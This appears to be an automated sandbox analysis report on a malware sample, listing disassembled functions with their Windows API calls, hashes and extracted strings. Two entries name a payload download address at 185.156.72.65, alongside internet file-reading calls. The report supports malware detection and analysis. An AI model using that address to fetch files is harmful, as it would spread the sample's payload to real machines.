                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04952D74
                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04952D82
                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04952D9D
                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04952DBC
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                    • String ID:
                    • API String ID: 2509773233-0
                    • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                    • Instruction ID: ad75ccc773eceebc192db8fb39c2314cbaead7f3e8e0fd29d23a60f79af1df4f
                    • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                    • Instruction Fuzzy Hash: 9131E532B00104AFEB14DF58DC40FAAB7B8EF48700F6541F9ED059B2A2DB31A916CB94
                    Function 00401330 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004013BB
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                    • API String ID: 2296764815-3011832937
                    • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                    • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                    • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                    • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                    Function 04951597 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04951622
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                    • API String ID: 4132704954-3011832937
                    • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                    • Instruction ID: f2a4a027ef8a0ee0b3476cacc3b775bdd46468fee5a2291894e2f4cb192b192f
                    • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                    • Instruction Fuzzy Hash: 2F2146B0F00244DAE730DF29E8467A9B3A0FB55308FB48279DC455B271DBB52986CB09
                    Function 0040CAD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                    • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID: api-ms-
                    • API String ID: 3177248105-2084034818
                    • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                    • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                    • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                    • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                    Function 004196CC Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetConsoleOutputCP.KERNEL32(73BDA22C,00000000,00000000,00000000), ref: 0041972F
                      • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                    • GetLastError.KERNEL32 ref: 00419A6A
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                    • String ID:
                    • API String ID: 2112829910-0
                    • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                    • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                    • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                    • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                    Function 04969933 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04969996
                      • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04969BE8
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04969C2E
                    • GetLastError.KERNEL32 ref: 04969CD1
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                    • String ID:
                    • API String ID: 2112829910-0
                    • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                    • Instruction ID: 090ace3839b3da5c97d2318d0a6ade9401a9e7bae4a9c71c157b85b3dba30f2d
                    • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                    • Instruction Fuzzy Hash: F3D16BB5E002489FCF15CFE8D8809ADBBF9FF49314F28456AE45AEB351D630A946CB50
                    Function 04951BD7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04951C6C
                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04951C8F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileInternet$PointerRead
                    • String ID:
                    • API String ID: 3197321146-0
                    • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                    • Instruction ID: eb7b93129c0bd39a399fa667d664963be0dca8c4f381e32a02064f17c29549db
                    • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                    • Instruction Fuzzy Hash: E2C14B70900218DFEB24DF64CC85BE9B7B9EF49304F2041E9E909A72A0D775BA84CF95
                    Function 0040BAA4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                    • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                    • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                    • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                    Function 0495BD0B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                    • Instruction ID: 5cc4e608ba870c86061b251413a45c7d5df544701d674f89a2be05a2e5113e03
                    • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                    • Instruction Fuzzy Hash: AE51A2B2601606AFEB29DF14D889BBA77A9EF40314F38453DDE054B6B0E731B954CB90
                    Function 004174E4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                    • GetLastError.KERNEL32 ref: 00417548
                    • __dosmaperr.LIBCMT ref: 0041754F
                    • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                    • __dosmaperr.LIBCMT ref: 00417590
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                    • String ID:
                    • API String ID: 1913693674-0
                    • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                    • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                    • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                    • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                    Function 0496774B Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                    • GetLastError.KERNEL32 ref: 049677AF
                    • __dosmaperr.LIBCMT ref: 049677B6
                    • GetLastError.KERNEL32(?,?,?,?), ref: 049677F0
                    • __dosmaperr.LIBCMT ref: 049677F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                    • String ID:
                    • API String ID: 1913693674-0
                    • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                    • Instruction ID: 89fbce9ef6911b3f7a181470303265efeba8fc05d8566701dc68da8c1070cfd8
                    • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                    • Instruction Fuzzy Hash: 1E216271600605AFEB11EFA598C0C6BB7ADFF842AC7108579E91B97250E735FC50CBA0
                    Function 0041121B Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                    • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                    • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                    • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                    Function 04961482 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                    • Instruction ID: df6395ff5d616979d49be4c64c05c387649a92e6d41db2ca51b23fd16f764d07
                    • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                    • Instruction Fuzzy Hash: E6218E71204205AFAB20EF659C8197AB7AEEF842A87108935F91BDB160E730FC4087A0
                    Function 00418485 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                      • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                    • String ID:
                    • API String ID: 158306478-0
                    • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                    • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                    • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                    • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                    Function 049635E0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,049636EF,0495381E,?,00000000,04952AA0,04952AA2,?,04963868,00000022,00420B0C,00422950,00422958,04952AA0), ref: 049636A1
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                    • Instruction ID: 067c916b0eb0639cacaf8424bae5b75bf55862140bc37f4bcbf575502e0cae7c
                    • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                    • Instruction Fuzzy Hash: 6B21D231B01610BBCB319F65EC42B9A3B6D9B427A4B254235ED07A73A1EB30FD05C6D4
                    Function 049686EC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 049686F4
                      • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496872C
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0496874C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                    • String ID:
                    • API String ID: 158306478-0
                    • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                    • Instruction ID: feb1a02ec53880696c5514432aa90a6bf02a22c72f3534a569fecb4c0ca89810
                    • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                    • Instruction Fuzzy Hash: 0611C4B66125197E77217B765CC8CAF3DADCEC91A87010534F90792100FA60FE0282B6
                    Function 0041CC28 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                    • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                      • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                    • ___initconout.LIBCMT ref: 0041CC5B
                      • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                    • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                    • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                    • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                    Function 0496CE8F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000), ref: 0496CEA6
                    • GetLastError.KERNEL32(?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000,?,0496A2C8,?), ref: 0496CEB2
                      • Part of subcall function 0496CE78: CloseHandle.KERNEL32(0042CA30,0496CEC2,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000,00000000), ref: 0496CE88
                    • ___initconout.LIBCMT ref: 0496CEC2
                      • Part of subcall function 0496CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0496CE69,0496CAF3,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CE4D
                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0496CB06,00000000,00000001,?,00000000,?,04969D25,00000000,00000000,00000000,00000000), ref: 0496CED7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                    • Instruction ID: 525149c5109c89400660402c7a5a91214a4283679d32bd0e85d18a4c906a30fe
                    • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                    • Instruction Fuzzy Hash: 18F0AC36540158BBCF225F95EC08A9A7F36FF496A1B458030FA5A96120D732AC219BD4
                    Function 00409D4D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                    Download Yara Rule
                    APIs
                    • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                    • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                    • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                    • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                    • String ID:
                    • API String ID: 3269011525-0
                    • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                    • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                    • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                    • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                    Function 00410F1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                    • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                    • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                    • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                    Function 004095D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                    • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                    • String ID: vector too long
                    • API String ID: 3646673767-2873823879
                    • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                    • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                    • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                    • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                    Function 0495BA67 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0495BAA6
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0495BB5A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 3480331319-1018135373
                    • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                    • Instruction ID: 0e7c3944bde18a15751221af0c1f39edf172653e307827899b3639b505ec047c
                    • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                    • Instruction Fuzzy Hash: 6C41A134E00219AFDF10DF68C884AAEBBF5AF45328F248175EC14AB365D771BA05CB91
                    Function 0040C0A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: EncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 2118026453-2084237596
